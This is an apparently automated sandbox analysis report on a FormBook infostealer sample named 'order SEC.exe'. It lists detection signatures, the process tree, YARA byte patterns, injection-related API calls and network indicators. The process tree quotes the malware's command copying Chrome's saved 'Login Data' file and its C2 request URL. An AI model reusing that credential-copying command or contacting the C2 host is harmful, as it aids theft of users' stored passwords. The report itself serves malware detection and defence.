Loading ...

Play interactive tourEdit tour

Analysis Report order SEC.exe

Overview

General Information

Sample Name:order SEC.exe
MD5:f319e92f4c7839b55943970fba7b6955
SHA1:7db24dcfff5e1e729c0fe42a8bdef1fc0c9e9e27
SHA256:b34eee81acc147f9414fe2e9b9779853f9139759e516304315a5572f5c57c583

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • order SEC.exe (PID: 4848 cmdline: 'C:\Users\user\Desktop\order SEC.exe' MD5: F319E92F4C7839B55943970FBA7B6955)
    • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
      • help.exe (PID: 4896 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • cmd.exe (PID: 1536 cmdline: /c del 'C:\Users\user\Desktop\order SEC.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5044 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x19229:$sqlite3step: 68 34 1C 7B E1
    • 0x1933c:$sqlite3step: 68 34 1C 7B E1
    • 0x19258:$sqlite3text: 68 38 2A 90 C5
    • 0x1937d:$sqlite3text: 68 38 2A 90 C5
    • 0x1926b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x19393:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0xa6a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xa912:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x165a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x16091:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x166a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1681f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xb48a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1530c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xc183:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18439:$sqlite3step: 68 34 1C 7B E1
      • 0x1854c:$sqlite3step: 68 34 1C 7B E1
      • 0x18468:$sqlite3text: 68 38 2A 90 C5
      • 0x1858d:$sqlite3text: 68 38 2A 90 C5
      • 0x1847b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x185a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.order SEC.exe.1150000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.order SEC.exe.1150000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x23029:$sqlite3step: 68 34 1C 7B E1
        • 0x2313c:$sqlite3step: 68 34 1C 7B E1
        • 0x23058:$sqlite3text: 68 38 2A 90 C5
        • 0x2317d:$sqlite3text: 68 38 2A 90 C5
        • 0x2306b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x23193:$sqlite3blob: 68 53 D8 7F 8C
        0.2.order SEC.exe.1150000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x144a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14712:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x203a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x1fe91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x204a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x2061f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x1528a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1f10c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x15f83:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x25717:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x2671a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

        Sigma Overview


        System Summary:

        barindex
        Sigma detected: Steal Google chrome login dataShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\help.exe, ParentImage: C:\Windows\SysWOW64\help.exe, ParentProcessId: 4896, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 5044

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for submitted fileShow sources
        Source: order SEC.exeVirustotal: Detection: 31%Perma Link
        Source: order SEC.exeMetadefender: Detection: 18%Perma Link
        Source: order SEC.exeReversingLabs: Detection: 50%
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPE
        Machine Learning detection for sampleShow sources
        Source: order SEC.exeJoe Sandbox ML: detected

        Source: C:\Users\user\Desktop\order SEC.exeCode function: 4x nop then pop ebx0_2_011638BD
        Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx4_2_00A07ACD

        Source: global trafficHTTP traffic detected: GET /g8u/?al=BtDgLThBuVqSoyh6qwp+STmKpEzhPytcWsiDMbft7E7CgM5vznTAvCjXRzXIZ34LQ1BZ&S4P=bTwh_fzxcT HTTP/1.1Host: www.scentsationalsniffers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewASN Name: unknown unknown
        Source: global trafficHTTP traffic detected: GET /g8u/?al=BtDgLThBuVqSoyh6qwp+STmKpEzhPytcWsiDMbft7E7CgM5vznTAvCjXRzXIZ34LQ1BZ&S4P=bTwh_fzxcT HTTP/1.1Host: www.scentsationalsniffers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: unknownDNS traffic detected: queries for: www.ynnkfs.com
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: explorer.exe, 00000003.00000000.887217948.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: help.exe, 00000004.00000002.1175214039.0000000000DC2000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
        Source: help.exe, 00000004.00000002.1175214039.0000000000DC2000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
        Source: explorer.exe, 00000003.00000000.889413989.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: help.exe, 00000004.00000002.1177727172.0000000003B6F000.00000004.00000001.sdmpString found in binary or memory: https://www.scentsationalsniffers.com/g8u/?al=BtDgLThBuVqSoyh6qwp

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Detected FormBook malwareShow sources
        Source: C:\Windows\SysWOW64\help.exeDropped file: C:\Users\user\AppData\Roaming\O2LBPCVF\O2Llogri.iniJump to dropped file
        Source: C:\Windows\SysWOW64\help.exeDropped file: C:\Users\user\AppData\Roaming\O2LBPCVF\O2Llogrf.iniJump to dropped file
        Source: C:\Windows\SysWOW64\help.exeDropped file: C:\Users\user\AppData\Roaming\O2LBPCVF\O2Llogrv.iniJump to dropped file
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.936096041.000000000115B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.1173415775.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.1176368416.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.937366174.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.936678978.0000000001380000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.1175496790.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0.2.order SEC.exe.1150000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Initial sample is a PE file and has a suspicious nameShow sources
        Source: initial sampleStatic PE information: Filename: order SEC.exe
        Source: C:\Users\user\Desktop\order SEC.exeProcess Stats: CPU usage > 98%
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01175810 NtAllocateVirtualMemory,0_2_01175810
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01175760 NtClose,0_2_01175760
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01175630 NtCreateFile,0_2_01175630
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_011756E0 NtReadFile,0_2_011756E0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0117580A NtAllocateVirtualMemory,0_2_0117580A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0117575C NtClose,0_2_0117575C
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0117562A NtCreateFile,0_2_0117562A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A5F0 NtReadVirtualMemory,LdrInitializeThunk,0_2_0584A5F0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A540 NtDelayExecution,LdrInitializeThunk,0_2_0584A540
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A560 NtQuerySystemInformation,LdrInitializeThunk,0_2_0584A560
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A480 NtMapViewOfSection,LdrInitializeThunk,0_2_0584A480
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A4A0 NtUnmapViewOfSection,LdrInitializeThunk,0_2_0584A4A0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A410 NtQueryInformationToken,LdrInitializeThunk,0_2_0584A410
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A700 NtProtectVirtualMemory,LdrInitializeThunk,0_2_0584A700
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A720 NtResumeThread,LdrInitializeThunk,0_2_0584A720
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A750 NtCreateFile,LdrInitializeThunk,0_2_0584A750
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A6A0 NtCreateSection,LdrInitializeThunk,0_2_0584A6A0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A610 NtAdjustPrivilegesToken,LdrInitializeThunk,0_2_0584A610
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A3E0 NtFreeVirtualMemory,LdrInitializeThunk,0_2_0584A3E0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A360 NtAllocateVirtualMemory,LdrInitializeThunk,0_2_0584A360
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A2D0 NtClose,LdrInitializeThunk,0_2_0584A2D0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A240 NtReadFile,LdrInitializeThunk,0_2_0584A240
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A5A0 NtWriteVirtualMemory,0_2_0584A5A0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A520 NtEnumerateKey,0_2_0584A520
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584BD40 NtSuspendThread,0_2_0584BD40
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584ACE0 NtCreateMutant,0_2_0584ACE0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584B410 NtOpenProcessToken,0_2_0584B410
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A430 NtQueryVirtualMemory,0_2_0584A430
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A460 NtOpenProcess,0_2_0584A460
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A470 NtSetInformationFile,0_2_0584A470
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584B470 NtOpenThread,0_2_0584B470
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A780 NtOpenDirectoryObject,0_2_0584A780
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A710 NtQuerySection,0_2_0584A710
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A6D0 NtCreateProcessEx,0_2_0584A6D0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A650 NtQueueApcThread,0_2_0584A650
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584B0B0 NtGetContextThread,0_2_0584B0B0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A800 NtSetValueKey,0_2_0584A800
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A3D0 NtCreateKey,0_2_0584A3D0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A310 NtEnumerateValueKey,0_2_0584A310
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A350 NtQueryValueKey,0_2_0584A350
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A370 NtQueryInformationProcess,0_2_0584A370
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A2F0 NtQueryInformationFile,0_2_0584A2F0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A220 NtWaitForSingleObject,0_2_0584A220
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584BA30 NtSetContextThread,0_2_0584BA30
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0584A260 NtWriteFile,0_2_0584A260
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A310 NtEnumerateValueKey,LdrInitializeThunk,4_2_0323A310
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A360 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_0323A360
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A350 NtQueryValueKey,LdrInitializeThunk,4_2_0323A350
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A3E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_0323A3E0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A3D0 NtCreateKey,LdrInitializeThunk,4_2_0323A3D0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A260 NtWriteFile,LdrInitializeThunk,4_2_0323A260
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A240 NtReadFile,LdrInitializeThunk,4_2_0323A240
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A2D0 NtClose,LdrInitializeThunk,4_2_0323A2D0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A800 NtSetValueKey,LdrInitializeThunk,4_2_0323A800
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A750 NtCreateFile,LdrInitializeThunk,4_2_0323A750
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A610 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_0323A610
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A6A0 NtCreateSection,LdrInitializeThunk,4_2_0323A6A0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A560 NtQuerySystemInformation,LdrInitializeThunk,4_2_0323A560
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A540 NtDelayExecution,LdrInitializeThunk,4_2_0323A540
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A410 NtQueryInformationToken,LdrInitializeThunk,4_2_0323A410
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A470 NtSetInformationFile,LdrInitializeThunk,4_2_0323A470
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A480 NtMapViewOfSection,LdrInitializeThunk,4_2_0323A480
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323ACE0 NtCreateMutant,LdrInitializeThunk,4_2_0323ACE0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A370 NtQueryInformationProcess,4_2_0323A370
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A220 NtWaitForSingleObject,4_2_0323A220
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323BA30 NtSetContextThread,4_2_0323BA30
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A2F0 NtQueryInformationFile,4_2_0323A2F0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323B0B0 NtGetContextThread,4_2_0323B0B0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A720 NtResumeThread,4_2_0323A720
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A700 NtProtectVirtualMemory,4_2_0323A700
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A710 NtQuerySection,4_2_0323A710
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A780 NtOpenDirectoryObject,4_2_0323A780
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A650 NtQueueApcThread,4_2_0323A650
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A6D0 NtCreateProcessEx,4_2_0323A6D0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A520 NtEnumerateKey,4_2_0323A520
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323BD40 NtSuspendThread,4_2_0323BD40
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A5A0 NtWriteVirtualMemory,4_2_0323A5A0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A5F0 NtReadVirtualMemory,4_2_0323A5F0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A430 NtQueryVirtualMemory,4_2_0323A430
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323B410 NtOpenProcessToken,4_2_0323B410
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A460 NtOpenProcess,4_2_0323A460
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323B470 NtOpenThread,4_2_0323B470
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_0323A4A0 NtUnmapViewOfSection,4_2_0323A4A0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A198F0 NtReadFile,4_2_00A198F0
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A19840 NtCreateFile,4_2_00A19840
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A19970 NtClose,4_2_00A19970
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A19A20 NtAllocateVirtualMemory,4_2_00A19A20
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1983A NtCreateFile,4_2_00A1983A
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A1996C NtClose,4_2_00A1996C
        Source: C:\Windows\SysWOW64\help.exeCode function: 4_2_00A19A1A NtAllocateVirtualMemory,4_2_00A19A1A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_011568120_2_01156812
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_011788000_2_01178800
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0117989C0_2_0117989C
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01178B370_2_01178B37
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0115EB800_2_0115EB80
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01165D500_2_01165D50
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01165D4C0_2_01165D4C
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_011785930_2_01178593
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01178DA60_2_01178DA6
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0115EDA00_2_0115EDA0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_01178C710_2_01178C71
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_011787B90_2_011787B9
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0115CE200_2_0115CE20
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0117962F0_2_0117962F
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058AE58A0_2_058AE58A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058CE5810_2_058CE581
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058BFDDB0_2_058BFDDB
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058CD5D20_2_058CD5D2
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058B1DE30_2_058B1DE3
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D25190_2_058D2519
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C1D1B0_2_058C1D1B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058215300_2_05821530
